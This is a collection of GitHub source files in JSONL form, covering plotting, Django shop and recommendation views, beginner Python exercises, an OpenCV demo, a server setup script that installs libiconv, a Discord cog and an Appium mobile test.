+{"seq_id":"7593650262","text":"import matplotlib.pyplot as plt\nimport csv\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport numpy as np\n\n\ndef read_grid(File):\n ''' \n read_grid - Reads a CSV file\n Parameters\n ----------\n File : CSV file\n \n Returns\n -------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n Data = np.genfromtxt(File, delimiter=',', dtype=\"float\")\n \n X = Data[0]\n X = np.delete(X, 0)\n Y = (Data[:,0])\n Y = np.delete(Y, 0)\n\n Grid = np.array([])\n \n for i in range(1, (X.size + 1)):\n Temp = Data[:,i]\n Temp = np.delete(Temp, 0)\n Grid = np.append(Grid, Temp)\n \n Grid = np.reshape(Grid, (X.size, Y.size))\n return X, Y, Grid \n\ndef grid_plot(X, Y, Grid):\n '''\n grid_plot - Plot the energy surface\n \n Parameters\n ----------\n X : X axis of grid : Numpy array\n Y : Y axis of grid : Numpy array\n Grid : XY grid of energies : 2d numpy array\n '''\n X, Y = np.meshgrid(X, Y)\n plt.contourf(X, Y, Grid, 25, cmap='jet', interpolation='nearest')\n plt.xlabel(\"Displacement in X (\" r'$\\AA$' \")\", fontsize=18)\n plt.ylabel(\"Displacement in Y (\" r'$\\AA$' \")\", fontsize=18)\n plt.tick_params(labelsize=14)\n plt.tight_layout()\n plt.colorbar()\n plt.savefig(\"Surface_Plot.png\", dpi=600)\n plt.close()\n\n\n\nX, Y, Grid = read_grid(\"grid.csv\")\ngrid_plot(X, Y, Grid)\n\n\n\n","repo_name":"symmy596/Metadise_GB_Scripts","sub_path":"GB-Surface.py","file_name":"GB-Surface.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"25884598624","text":"from django.shortcuts import render, get_list_or_404\n\nfrom django.http import HttpResponse\nfrom .models import SkinType, SkinConcern, Option, Question, Questionnaire, QuestionnaireUserData, QuestionnaireEntry\nfrom home.models import Ingredient, Base, MixingAgent, Recipe, FacePack, CustomFacePack, SkinTypeIngredient, SkinTypeConcernIngredient\nfrom django.contrib.auth.models import User\nfrom cart.models import Cart\nfrom userregistration.views import init_user_login\nfrom home.views import cart_size, get_valid_user_data\nfrom django.db.models import Q\nimport json\nimport random\nimport pdb\n\n# Create your views here.\n\ndef wizard(request):\n data = [] \n for q in Question.objects.all():\n data.append({ \n 'id' : q.id,\n 'name' : q.name,\n 'why' : q.why,\n 'multiple' : 'multiple' if q.id == 8 else '',\n 'options' : [{\n 'name': o['option__name'],\n 'id': o['option__id'], \n 'helper': o['option__helper']\n } for o in Questionnaire.objects.filter(question=q).\\\n values('option__name','option__id',\n 'option__helper')]\n })\n return render(request, \"wizard.html\", \n { 'questions': data, \n 'cart_size': cart_size(request),\n 'valid_user': get_valid_user_data(request) })\n\ndef wizard_submit(request):\n json_response = { 'success': False }\n if request.method == 'POST':\n init_user_login(request)\n data = json.loads(request.POST['data'])\n user = request.user\n skinType = None\n skinConcerns = None\n wz = QuestionnaireUserData() \n wz.user = user\n wz.save()\n for d in data:\n for o in d['options']:\n qe = QuestionnaireEntry()\n qe.question = Question.objects.get(pk=d['id'])\n qe.option = Option.objects.get(pk=o)\n qe.wizard = wz\n qe.save()\n if d['id'] == '7':\n skinType = SkinType.objects.get(pk=d['options'][0]);\n if d['id'] == '8':\n skinConcerns = SkinConcern.objects.filter(id__in=d['options'])\n recipes = Recipe.objects.filter(skin_type=skinType, skin_concern__in=skinConcerns)\n recipes_ing = [r.mandatory_ingredient for r in recipes]\n skin_type_ingredients = Ingredient.objects.filter(id__in=SkinTypeIngredient.objects.filter(skin_type=skinType).values('ingredient'))\n o_ids = []\n for r in recipes:\n ri = random.choice(SkinTypeConcernIngredient.objects\\\n .filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n .filter(~Q(ingredient=r.mandatory_ingredient), ~Q(ingredient_id__in=o_ids))).ingredient\n o_ids.append(ri)\n base = random.choice(Base.objects.filter(skin_type=skinType))\n \"\"\"\n Base conditions:\n 1. French green clay cannot be used for people with skin concern \"Sensitive\n and irritated by harsh ingredients\"\n 2. For skin combination oily and skin concern \" sensitive and irritated by\n harsh ingredients\" : always use white kaolin clay\n 3. 
For skin combination dry and skin concern \" sensitive and irritated by \n harsh ingredients\" : always use white goat milk powder\n \"\"\"\n if SkinConcern.objects.get(name__contains=\"Sensitive\") in skinConcerns:\n if skinType.name == 'Oily':\n base = Base.objects.get(name__contains='White Kaolin Clay')\n elif skinType.name == 'Dry':\n base = Base.objects.get(name__contains='Goat Milk')\n else:\n base = random.choice(Base.objects.filter(skin_type=skinType)\\\n .filter(~Q(pk=Base.objects.get(name__contains='French').id)))\n mixing_agent = random.choice(MixingAgent.objects.filter(skin_type=skinType))\n json_response = {\n 'base'\t : str(base.id),\n 'mixing_agent' : str(mixing_agent.id),\n 'recipes' : [str(r.id) for r in recipes],\n 'optional' : [str(o.id) for o in o_ids],\n 'qd' : str(wz.id),\n } \n return HttpResponse(json.dumps(json_response, ensure_ascii=False))\n\ndef results(request):\n if request and request.method == 'GET':\n init_user_login(request)\n user = request.user\n recipe_ids = [int(x) for x in request.GET.getlist('recipes[]')]\n o_ids = [int(x) for x in request.GET.getlist('optional[]')]\n recipes = Recipe.objects.filter(id__in=recipe_ids)\n secondary_ings = Ingredient.objects.filter(id__in=o_ids)\n qd_id = request.GET.get('qd')\n skin_type = request.GET.get('skin_type', None)\n base = Base.objects.get(pk=request.GET.get('base'))\n mixing_agent = MixingAgent.objects.get(pk=request.GET.get('mixing_agent'))\n #secondary_ings = [random.choice(SkinTypeConcernIngredient.objects\\\n #.filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n #.filter(~Q(ingredient=r.mandatory_ingredient))).ingredient\\\n #for r in recipes]\n essential_oils = Ingredient.objects.get(name__contains=\"Essential Oils\")\n r1 = recipes[0]\n r2 = recipes[1]\n r3 = recipes[2]\n o1 = secondary_ings[0]\n o2 = secondary_ings[1]\n o3 = secondary_ings[2]\n o_ids = [i.id for i in secondary_ings]\n\n data = {\n 'first': {\n 'type': 'primary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n 'recipes': [{\n 'id': r.id,\n 'i_id': r.mandatory_ingredient.id,\n 'i_name': r.mandatory_ingredient.name,\n 'i_image': r.mandatory_ingredient.image,\n 'i_helper': r.mandatory_ingredient.helper,\n 'i_description': r.mandatory_ingredient.description,\n } for r in recipes],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o_ids': [],\n 'qd_id': qd_id,\n },\n 'second': {\n 'type': 'secondary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n #'recipes': [{\n #'id': r.id,\n #'i_id': r.mandatory_ingredient.id,\n #'i_name': 
r.mandatory_ingredient.name,\n #'i_image': r.mandatory_ingredient.image,\n #'i_helper': r.mandatory_ingredient.helper,\n #'i_description': r.mandatory_ingredient.description,\n #} for r in recipes],\n 'recipes': [{\n 'id': i.id,\n 'i_id': i.id,\n 'i_name': i.name,\n 'i_image': i.image,\n 'i_helper': i.helper,\n 'i_description': i.description,\n } for i in secondary_ings],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o1_id': o1.id,\n 'o2_id': o2.id,\n 'o3_id': o3.id,\n 'o_ids': o_ids,\n 'qd_id': qd_id,\n },\n 'qd_id': qd_id,\n 'skin_type': skin_type,\n }\n data['cart_size'] = cart_size(request)\n data['valid_user'] = get_valid_user_data(request)\n return render(request, \"results.html\", data)\n","repo_name":"dev1farms2face/f2f","sub_path":"farms2face/facepackwizard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
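A hedged sketch of the JSON payload that wizard_submit() above parses out of request.POST['data'] — a list of question dicts with option id lists; the endpoint path and ids here are illustrative only:

import json
import requests

payload = [
    {'id': '7', 'options': ['2']},        # skin type question: exactly one option
    {'id': '8', 'options': ['1', '3']},   # skin concern question: may be multiple
]
# posted as a form field named 'data', matching request.POST['data'] in the view
resp = requests.post('http://localhost:8000/wizard_submit', data={'data': json.dumps(payload)})
print(resp.json())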
+{"seq_id":"36874617680","text":"# Files\nfname = input(\"Enter file name: \")\nfh = open(fname)\ncount = 0\nsun = 0\nfor line in fh:\n if line.startswith(\"X-DSPAM-Confidence:\"):\n ipos = line.find(\":\")\n piece = line[ipos+1:]\n value = float(piece)\n count = count + 1\n sun = sun + value\nprint('Average spam confidence:', sun/count)","repo_name":"revacprogramming/python01-Tejadithya","sub_path":"ActivitySet01/problem08.py","file_name":"problem08.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"5437539935","text":"import time\nimport sys\n\nstart_time = time.time()\n\nfor line in sys.stdin:\n # solution found, print time\n if \"--\" in line:\n p = (time.time()-start_time)\n print(p)\n sys.stdout.write(line)\n sys.stdout.flush()","repo_name":"slipstreaming2/dissertation","sub_path":"bash/timingObjective.py","file_name":"timingObjective.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"}
+{"seq_id":"1605912163","text":"import urllib.request\nimport urllib.parse\n\n#1、确定爬取网页的url地址\nurl ='http://www.baidu.com/s'\nheader = {\n \"User-Agent\" : \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\",\n \"Connection\" : \"keep-alive\"\n}\n\n\nwd = {'wd':'吴京'}\nurlwd = urllib.parse.urlencode(wd)\nurl = url+'?'+urlwd\n#2、根据url获取网页信息\nurlRequest = urllib.request.Request(url, headers=header)\n\n\nresponse = urllib.request.urlopen(urlRequest)\n\n# print(type(urlRequest))\n# print(type(response))\n# print(response.getcode())\n# print(response.getheader(name=\"User-Agent\"))\n# print(urlRequest.get_header('Connection'))\n# print(urlRequest.get_header(\"User-Agent\"))\n\nprint(response.geturl())\nprint(response.read().decode('utf-8'))","repo_name":"typeme/python_spider_study","sub_path":"Day05/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"33086828747","text":"def say_hello(name):\n return \"Hi my name is {}\".format(name)\n # takes in a name and returns the string \"Hi my name is \" plus the name\n # use whichever form of interpolation is most appropriate\n\ndef replace_given_substring(str_to_replace, str_to_insert, string):\n return string.replace(str_to_replace, str_to_insert)\n # this function takes three parameters --\n # the first is the substring we would like to replace.\n # the second substring is what we would like to use inplace of the first\n # the third is the actual string which we want to operate on\n # the function should return the new string\n\ndef remove_duplicate_punctuation(string_var):\n import string\n new_string = ''\n punctuation = string.punctuation\n for x in range(1,(len(string_var))):\n if string_var[x-1] not in punctuation:\n new_string = new_string + string_var[x-1]\n elif string_var[x-1] != string_var[x]:\n new_string = new_string + string_var[x-1]\n return new_string + string_var[-1]\n # should remove all duplicate punctuation marks in a given string\n # i.e. \"Hi!!!!!!\" should be reformatted to \"Hi!\"\n # i.e. \"Hello..... My name is Terrance!! How are you???\" -> \"Hello. My name is Terrance! How are you?\"\n\n\ndef validate_email_format(email):\n import string\n if email.count('@') == 1 and email.count('.com') == 1:\n special_char = string.punctuation\n person_part = (email.split('@'))[0]\n correct_email = ''\n for char in person_part:\n if char not in special_char:\n correct_email = correct_email + char\n if correct_email == person_part:\n return True\n else:\n return False\n else:\n return False\n\n # should make sure there are no special characters (i.e. *,~,#,$,%,&,(,),`,\",',:,;,/,>,<)\n # make sure the email contains an @ symbol and a .com\n # return True if format passes tests, return False otherwise\n\n\ndef anonymize_credit_card_number(credit_card_number):\n credit_card = credit_card_number[:-4]\n ccn = ''\n for char in credit_card:\n try:\n if type(int(char)) == int:\n ccn = ccn + 'X'\n except:\n ccn = ccn + char\n return ccn + credit_card_number[-4:]\n # should replace all characters except the last 4 with 'X'\n # return the anonymized credit card number as a string\n # the credit card may have characters that are not numbers (i.e. spaces and dashes, which we would want to keep)\n # i.e. 1234-5678-90-1234 -> XXXX-XXXX-XX-1234\n","repo_name":"ptbailey/python-strings-indepth-lab","sub_path":"string_functions.py","file_name":"string_functions.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"}
+{"seq_id":"20247404948","text":"from random import randrange\nA =[1,2,3,4,5]\n\ndef shuffle(A):\n #i from 0 - n-1 \n for i in range(len(A)-1):\n #j from i to n\n j =randrange(i,len(A))\n A[i],A[j]=A[j],A[i]\n#[4, 5, 1, 2, 3]\n","repo_name":"Boom-Ba/Math","sub_path":"Probability/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"16983654292","text":"class Solution:\n def findWinners(self, matches: List[List[int]]) -> List[List[int]]:\n wins = defaultdict(int)\n losses = defaultdict(int)\n \n undefeated = []\n oneloss = []\n for m in matches:\n wins[m[0]] += 1\n losses[m[1]] += 1\n \n minplayer = min(min(wins.keys()), min(losses.keys()))\n maxplayer = max(max(wins.keys()), max(losses.keys()))\n \n for n in range(minplayer, maxplayer+1):\n if losses[n] == 0 and wins[n] > 0:\n undefeated.append(n)\n elif losses[n] == 1:\n oneloss.append(n)\n \n return [undefeated, oneloss]","repo_name":"dyhliang/Leetcode","sub_path":"2225-find-players-with-zero-or-one-losses/2225-find-players-with-zero-or-one-losses.py","file_name":"2225-find-players-with-zero-or-one-losses.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"42831323523","text":"__author__ = \"Riccardo Cagnasso \"\n\nimport collections as coll\n\n\nclass PickOne(object):\n \"\"\"\n PickOne is a class that you use for asking the user to choose between\n some options\n\n Arguments:\n choiches --- the available options between the user can choose. It can\n be an array or a dictionary. In the first case the keys are int from 0\n to len-1.\n\n Keyword arguments:\n message (optional) --- the message to be displayed when asking for\n input. It's a template for \"format\" function and receives the\n \"{choices}\" and the {default} parameter.\n errormessage (optional) --- the message to be displayed when the user\n entered a incorrect answer\n default (optional) --- a default value to use if user provides no input\n \"\"\"\n def __init__(self, choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None, cancel=False, cancelkey='c',\n cancelmessage='(press {cancelkey} to cancel)'):\n self.message = message\n self.errormessage = errormessage\n\n self.cancel = cancel\n self.cancelkey = cancelkey\n self.cancelmessage = cancelmessage\n\n if type(choices) == list:\n self.choices = coll.OrderedDict(\n zip(map(str, range(0, len(choices))), choices))\n elif issubclass(choices.__class__, dict):\n self.choices = coll.OrderedDict([(str(k), v)\n for k, v in choices.items()])\n\n self.default = default\n\n def buildPrompt(self):\n choices = [\"{key}={choice}\".format(key=key, choice=choice)\n for key, choice in self.choices.items()]\n\n if self.default is not None:\n default = \" (default={default})\".format(default=self.default)\n else:\n default = \"\"\n\n if self.cancel:\n cancelmessage = self.cancelmessage.format(cancelkey=self.cancelkey)\n else:\n cancelmessage = ''\n\n return self.message.format(choices=\" \".join(choices), default=default,\n cancelmessage=cancelmessage)\n\n def ask(self):\n \"\"\"\n The ask method is used to get the input from users\n \"\"\"\n while True:\n i = input(self.buildPrompt())\n\n if self.cancel and i == self.cancelkey:\n return None\n\n if i == \"\" and self.default is not None:\n i = self.default\n\n if i in self.choices:\n return self.choices[i]\n else:\n for k, v in self.choices.items():\n if i == str(v):\n return self.choices[k]\n\n print(self.errormessage)\n\n\ndef ask(choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None,\n cancel=False, cancelkey='c',\n cancelmessage='press {cancelkey} to cancel'):\n \"\"\"\n ask is a shorcut instantiate PickOne and use .ask method\n \"\"\"\n\n return PickOne(choices, message, errormessage, default, cancel, cancelkey,\n cancelmessage).ask()\n","repo_name":"riccardocagnasso/pickone","sub_path":"pickone/pickone.py","file_name":"pickone.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"11408728909","text":"\"\"\"Split and merge color channels\"\"\"\nimport cv2\nimage=cv2.imread(\"image2.png\")\nb,g,r=cv2.split(image)\n\ncv2.imshow(\"Red\",r)\ncv2.imshow(\"Green\",g)\ncv2.imshow(\"Blue\",b)\n\nmerged=cv2.merge((r,g,b))\ncv2.imshow(\"Merged\",merged)\n\nif cv2.waitKey(0)==27:\n\tcv2.destroyAllWindows()\n","repo_name":"glen-s-abraham/sem3record","sub_path":"DIP/splitColorChannel.py","file_name":"splitColorChannel.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40083050049","text":"# coding=utf-8\nimport sys\nfrom os import path\nfrom simplejson import load\nfrom subprocess import call\nfrom cloud import login\nfrom cloud import add_server\nfrom requests import Session\nfrom utility import exit_with_msg\nfrom utility import print_info\nfrom utility import print_error\nfrom utility import parseArg\n\n\ndef assert_ext(ext_file):\n if (path.isfile(ext_file) == False):\n exit_with_msg('file ext.json does not exist.')\n\n\ndef create_and_exec_install_shell(ext_object):\n try:\n cmd = '#!/bin/bash\\nsudo apt-get update\\n'\n for package_name in ext_object['install_packages']:\n cmd += 'sudo apt-get install -y %s\\n' % package_name\n install_shell = open('./install.sh', 'w+')\n cmd += '\\n'\n install_shell.write(cmd)\n install_shell.close()\n ret = call('sudo chmod a+x install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('chmod for install')\n ret = call('./install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('exec install.sh')\n ret = call('sudo rm -f install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('rm install.sh')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user - when install shell')\n sys.exit(1)\n except IOError:\n print_error('IO Error - when install shell')\n sys.exit(1)\n\n\ndef dowload_compile_and_install_libiconv():\n try:\n cmd = \"axel https://ftp.gnu.org/pub/gnu/libiconv/libiconv-1.15.tar.gz\\n \\\n tar -xvf libiconv-1.15.tar.gz\\n \\\n cd libiconv-1.15\\n \\\n sudo ./configure --prefix=/usr/local\\n \\\n sudo make\\n \\\n sudo make install\\n \\\n cd -\\n \\\n sudo rm libiconv* -rf\\n \\\n sudo ldconfig\"\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('install libiconv')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\ndef ln_hiredis():\n cmd = 'sudo ln -s /usr/lib/x86_64-linux-gnu/libhiredis.so.0.10 /usr/lib/x86_64-linux-gnu/libhiredis.so.0.13'\n ret = call(cmd, shell=True)\n return ret\n\n\ndef link_hiredis(ext_dir):\n try:\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.13')):\n return\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.10')):\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n else:\n cmd = 'sudo cp %slibhiredis.so.0.10 /usr/lib/x86_64-linux-gnu' % ext_dir\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('cp libhiredis.so')\n else:\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n isCalc = False\n isCalc = parseArg(sys.argv[1:])\n ext_dir = '../ext/'\n assert_ext(ext_dir + 'ext.json')\n ext_object = load(open(ext_dir + 'ext.json', 'r'))\n create_and_exec_install_shell(ext_object)\n session = Session()\n ret = login(session, ext_object['cloud_login_url'], ext_object['cloud_username'],\n ext_object['cloud_password'], debug=ext_object['debug_mode'])\n if (ret):\n print_info('Login success')\n ret = add_server(\n session, ext_object['cloud_add_server_url'], ext_dir, debug=ext_object['debug_mode'])\n if (ret):\n print_info('Add server success')\n else:\n exit_with_msg('Add server fail')\n else:\n exit_with_msg('Login fail')\n if (isCalc == False):\n link_hiredis(ext_dir)\n 
dowload_compile_and_install_libiconv()\n","repo_name":"niconical/Script","sub_path":"auto_deploy/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72094806119","text":"import discord\nfrom discord.ext import commands\n\nclass Avatar(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def avatar(self, ctx, member: discord.Member = None):\n if member is None:\n member = ctx.author\n\n embed = discord.Embed(title=f\"Avatar - {member.name}\", color=discord.Color.blue())\n embed.set_image(url=member.avatar_url)\n\n await ctx.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(Avatar(bot))\n","repo_name":"xxsweatygirlyt/orko-bot","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74513080359","text":"'''\nConverts a string to a binary file.\nUsage: python b.py \nExample: python b.py \"Hello World\" hello.bin\n'''\n\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python b.py \")\n sys.exit(1)\n\ninput_string = sys.argv[1]\nfile_name = sys.argv[2]\n\nwith open(file_name, \"wb\") as binary_file:\n binary_file.write(input_string.encode())","repo_name":"dimitrivlachos/Inky-pHAT-Zero","sub_path":"b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"5441628247","text":"# -*- coding: utf-8 -*-\n# @Time : 18-9-12 下午1:47\n# @Author : Gold_py\n# @Site : \n# @File : urls.py\n# @Software: PyCharm\nfrom django.conf.urls import url\nfrom .views import IndexViews,User\n\n\nurlpatterns = [\n # 跳转到商城的首页面\n url(r'^$', IndexViews.homeindex,name='home_index' ),\n # 商城的列表页面\n url(r'^list/(?P[0-9]+)/$',User.UserList,name='user_list'),\n # 商城商品的详情页面\n url(r'^info/(?P[0-9]+)/$',User.UserInfo,name='user_info'),\n # 商城的注册界面\n url(r'^register/$',User.UserRegiser,name='user_regiser'),\n # 商城的登录界面\n url(r'^login/$',User.UserLogin,name='user_login'),\n # 验证码的生成位置\n url(r'^passcode/$',User.verifycode,name='user_pass_code'),\n # 获取手机验证码\n url(r'^phonecode/$',User.phonecode,name='user_phone_code'),\n # 退出都登录\n url(r'^logout/$',User.UserLogOut,name='user_log_out'),\n # 购物车\n url(r'^bycar/$',User.UserCar,name='user_car'),\n # 加入购物车\n url(r'^bycar/addgood/$',User.AddGood,name='add_good'),\n # 跟改购物车\n url(r'^bycar/edit_good/$',User.GoodEdit,name='good_edit'),\n # 删除购物车中的某个商品\n url(r'^bycar/del_good/$',User.GoodDel,name='good_del'),\n # 清除购物车\n url(r'^bycar/flush/$',User.GoodFlushi,name='good_flush'),\n\n\n\n # 以下的操作需要获取登录认证\n\n\n\n # 商城跳转到确认订单的页面\n url(r'^order/confirm/$',User.OrderMake,name='order_make'),\n # 生成订单\n url(r'^order/create/$',User.OrderCreate,name='order_create'),\n # 跳转到付款的界面\n url(r'^order/payfor/$',User.OrderPayFor,name='order_pay_for'),\n # 订单状态改变为1,已付款\n url(r'^order/payfored/$',User.OrderPayFored,name='order_pay_fored'),\n # 跳转到付款成功界面\n url(r'^order/payforsuccess/$',User.OrderPayForSuccess,name='order_pay_for_suscess'),\n # 跳转到我的订单界面\n url(r'^my/order/orderlist/$',User.MyOrderList,name='my_order_list'),\n\n\n # 添加地址\n url(r'^user/addaddress/$',User.AddAdderss,name='add_address'),\n # 地址管理器\n url(r'address/manage/$',User.AdderssManage,name='address_manage'),\n # 删除地址\n url(r'address/manage/delete/$',User.AdderssManageDelete,name='address_manage_delete'),\n # 跟改地址\n url(r'address/manage/update/$',User.AdderssManageUpdate,name='address_manage_update'),\n\n\n # 个人中心\n url('^user/mycenter/$',User.MyCenter,name='my_center'),\n # 更改个人信息\n url('^user/mycenter/$',User.MyCenter,name='my_center'),\n\n\n # 初始化密码\n url('^init/$',User.Init,name='init'),\n\n\n\n\n # 缓存测试\n url('^cache1/$',User.cache1,name='cache1'),\n url('^cache2/$',User.cache2,name='cache2'),\n\n\n\n\n\n]","repo_name":"GITliyanfeng/phone-shop-django","sub_path":"myhome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"20637984313","text":"# -*- coding:utf-8 -*-\nimport sys,re,subprocess\nsys.path.append('..')\n\nfrom time import sleep\nimport unittest\nimport lib.public_functions as pubfuc\nimport multiprocessing\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\n\ndef 加入离开房间(driver,roomid):\n print(driver.desired_capabilities)\n devicedriverinfo = driver.desired_capabilities\n sleep(5)\n num = 1\n print(driver.page_source)\n while num < 301:\n if num == 1:\n driver.find_element_by_xpath('//android.widget.EditText[@text=\"会议室名称\"]').send_keys(roomid)\n sleep(2)\n print(f\"第{num}次{driver}加入离开房间\")\n # io.agora.vcall:id/encryption_key\n # pubfuc.waittimeout(driver.find_element_by_id(控件信息['JOIN']['id']))\n if not driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').get_attribute('enabled'):\n sleep(3)\n driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').click()\n sleep(10)\n if driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\") is None:\n driver.tap([100,100])\n sleep(2)\n driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\").click()\n sleep(2)\n num += 1\n\n\nclass AgoraTest(unittest.TestCase):\n\n def setUp(self):\n # self.控件信息 = pubfuc.getymlfileinfo()['zego_Android']\n #第一个为主播\n devicelist = ['RedMI']\n\n\n self.sd = pubfuc.StartDriver(devicelist)\n\n self.proc_list = []\n 是否mac = 'mac' in pubfuc.getcurretsystem()\n\n pubfuc.cleannodeproc()\n for i in range(len(self.sd.devicelist)):\n self.proc_list.append(multiprocessing.Process(target=self.sd.startappiumserver, args=(i,)))\n\n # print(self.proc_list)\n\n for pro in self.proc_list:\n pro.start()\n\n for pro in self.proc_list:\n pro.join()\n\n while len(self.sd.getnodeprocpid()) < len(devicelist):\n sleep(1)\n\n\n print(self.sd.getnodeprocpid())\n\n self.driverlist = []\n for i in range(len(self.sd.devicelist)):\n desire_caps = self.sd.realdevice[i]\n desire_caps['appPackage'] = 'io.agora.vcall'\n desire_caps['appActivity'] = 'io.agora.vcall.ui.SplashActivity'\n driver = webdriver.Remote(f\"http://localhost:{self.sd.aport[i]}/wd/hub\", desire_caps)\n self.driverlist.append(driver)\n driver.page_source\n print(self.driverlist)\n\n def test_001参与者多次加入离开房间(self):\n procs = []\n pool = multiprocessing.Pool(processes=len(self.driverlist))\n for driver in self.driverlist:\n proc = pool.apply_async(加入离开房间,(driver,'qq',))\n procs.append(proc)\n for i in procs:\n i.get()\n for i in procs:\n i.wait()\n\n def tearDown(self):\n # quite the device driver\n for driver in self.driverlist:\n driver.quit()\n for proc in self.proc_list:\n print(proc.is_alive())\n proc.terminate()\n # proc.kill()\n #clean the node process,appium server is started by node\n pubfuc.cleannodeproc()\n\n\n\n\n\n","repo_name":"zhhy/auto","sub_path":"testcase/agora_testcase.py","file_name":"agora_testcase.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
